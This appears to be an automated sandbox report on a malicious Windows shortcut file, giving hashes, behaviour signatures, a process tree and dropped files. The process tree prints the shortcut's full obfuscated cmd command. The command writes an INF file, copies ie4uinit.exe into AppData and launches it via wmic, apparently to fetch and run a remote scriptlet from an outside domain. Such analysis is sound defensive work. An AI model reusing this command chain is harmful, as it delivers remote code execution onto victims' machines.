Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240704-en locale:en-us os:windows7-x64 system
  • submitted
    23-08-2024 05:27

General

  • Target

    Mark Qualman.lnk

  • Size

    5KB

  • MD5

    4a792636a97df1ddec0d4e54272ca177

  • SHA1

    038ef3af740407c9514b28e7aa8524bcf84b9bed

  • SHA256

    f115187143a80b062a4844dbd462ed183e374263eeea874780eb65775991da22

  • SHA512

    3beb9b7608a93757913cd7f31614f5cbdd9a0a6c7bb9ad9fa70cb7d498b8479f89bf46217f7ad70eb731ef933f627cc3e33599d275396ca69eda3b9e714909b7

  • SSDEEP

    96:8u5XtaRd9qmN5yYLhTrrfhbFKyVmZXj5kpYZuBPSk:8Mad9qm7yurdbFxaj5kpXF

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Mark Qualman.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c (for %u in (s) do @set "Assets=%~u") && (for %q in (a) do @!Assets!et "Totals=%~q") && !Assets!et "Improvements=default" && (for %d in (c) do @!Assets!et "Someone=%~d") && !Assets!et "Occasions=d" && !Assets!et "Facts=si" && !Assets!et "Scholars=version" && !Assets!et "Appliances=settings" && !Assets!et "Proceeds=t" && !Assets!et "Truly=ure = " && !Assets!et "Belongs=ni" && !Assets!et "Arrow=e" && !Assets!et "Tattoo=$win" && !Assets!et "Moderators=." && !Assets!et "Plastics=a" && !Assets!et "Traditions=!Moderators!inf" && !Assets!et "Barrel=ieui!Belongs!t!Traditions!" && c!Plastics!ll !Assets!et "Cleaners=%!Totals!ppd!Plastics!ta%\micro!Assets!oft\" && s!Arrow!t "Officers=!Cleaners!!Barrel!" && (for %u in ("[!Scholars!]" "signat!Truly!!Tattoo!dows nt$" "[7E55D7]" "ieu%Quantities%!Traditions!" "[!Occasions!e!Assets!tinationdirs]" "!Improvements!destdir=11" "7E55D7=01" "[BCB]" "sc\" "ro%Weights%j,NI,%Umbrella%%Situate%%Situate%p%Racks%%Otherwise%%Otherwise%oshof!Moderators!markqualman!Moderators!%Produce%/jlghiht" "[s!Proceeds!ring!Assets!]" "Otherwise=/" "!Assets!ervicen!Totals!me=' '" "!Assets!hortsvcn!Totals!me=' '" "Umbrella=h" "Order=%time%" "Situate=t;Pencil" "Racks=:;Bones" "Quantities=i!Belongs!t" "Produce=com" "Weights=b;Unaware" "[!Improvements!in!Assets!tall.windows7]" "!Occasions!elfil!Arrow!s=7E55D7" "Un\" "Register\" "OCXs=BCB" ) do @e!Someone!ho %~u)>"!Officers!" && !Assets!et "Refers=ie4ui!Belongs!t.!Arrow!xe" && !Someone!all x!Someone!opy /Y /C /Q %win!Occasions!ir%\!Assets!ys!Proceeds!!Arrow!m32\!Refers! "!Cleaners!*" | !Assets!et Receivers04=Naive && !Assets!t!Totals!rt "" wmi!Someone! proce!Assets!s call !Someone!rea!Proceeds!e "!Cleaners!!Refers! -base!Appliances!" 
| !Assets!et "Receivers58=Stands Claim River Solid Twist Condos Meadow Cheers Weasel Luggage Gross Tanks Acquisitions Taste Gesture Version Referrals Fears Cameras Obtain Bullet Managers Medal Spots Commissions Dimensions Strips Checks Swarm Praise Increase Jeans Power Plants Colours Signs Possibilities Consensus Marine Investors Poverty Science"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:580
        • C:\Windows\system32\xcopy.exe
          xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*"
          4⤵
            PID:3016
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set Receivers04=Naive "
        3⤵
        PID:2716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2868
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set "Receivers58=Stands Claim River Solid Twist Condos Meadow Cheers Weasel Luggage Gross Tanks Acquisitions Taste Gesture Version Referrals Fears Cameras Obtain Bullet Managers Medal Spots Commissions Dimensions Strips Checks Swarm Praise Increase Jeans Power Plants Colours Signs Possibilities Consensus Marine Investors Poverty Science""
        3⤵
        PID:2860
  • C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe
    C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe
      C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
      2⤵
      • Executes dropped EXE
      PID:2628

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\wwwE246.tmp

    Filesize

    226B

    MD5

    ad93eaac4ac4a095f8828f14790c1f8c

    SHA1

    f84f24c4ca9d04485a0005770e3ef1ca30eede55

    SHA256

    729111c923821a7ad0bb23d1a1dea03edbf503cd8b732e2d7eb36cf88eaa0cac

    SHA512

    f561b98836233849c016227a3366fcf8449db662f21aecd4bd45eb988f6316212685ce7ce6e0461fb2604f664ed03a7847a237800d3cdca8ba23a41a49f68769

  • C:\Users\Admin\AppData\Roaming\microsoft\ieuinit.inf

    Filesize

    482B

    MD5

    1b43723805198519577fdea0d9855ad7

    SHA1

    53cc83793d6a293f7465b69eaa3b3e369a5c43ec

    SHA256

    1932c95c64c3db6ad2d3355c47eb0c48aaca6cc220ceeeb39775dc0606fbeb88

    SHA512

    7743d340903626fc946fc5d980b5011b892b6582c2f97fffe290a07fef2c8785989ccedcf4cb864602ff377f21cf6a81e1046920e07e430762a93eb158ef77e5

  • C:\Users\Admin\Favorites\Links\Web Slice Gallery.url

    Filesize

    134B

    MD5

    873c8643cbbfb8ff63731bc25ac9b18c

    SHA1

    043cbc1b31b9988d8041c3d01f71ce3393911f69

    SHA256

    c4ad21379c11da7943c605eadb22f6fc6f54b49783466f8c1f3ad371eb167466

    SHA512

    356b13b22b7b1717ded0ae1272b07f1839184e839132f3ab891b5d84421e375d4fc45158c291b46a933254f463c52d92574ce6b15c1402dfb00ee5d0a74c9943

  • \Users\Admin\AppData\Roaming\Microsoft\ie4uinit.exe

    Filesize

    213KB

    MD5

    05018a4e76f1636efbb7dcb76900872a

    SHA1

    347c1802b5e28998b0db7d6ba51846a707574abb

    SHA256

    bb2af4a415e1bfad250c99b5df20b46090cc9db1387381648b7d0818792d2fce

    SHA512

    7ca7e05f277c58176080db24bc34e3d2491a1495dc19511dae24a95f558c8e420b02270590730d7c7fccf7d65cfbdf40bc1de12d3ce6b8b8655def2a285b9f94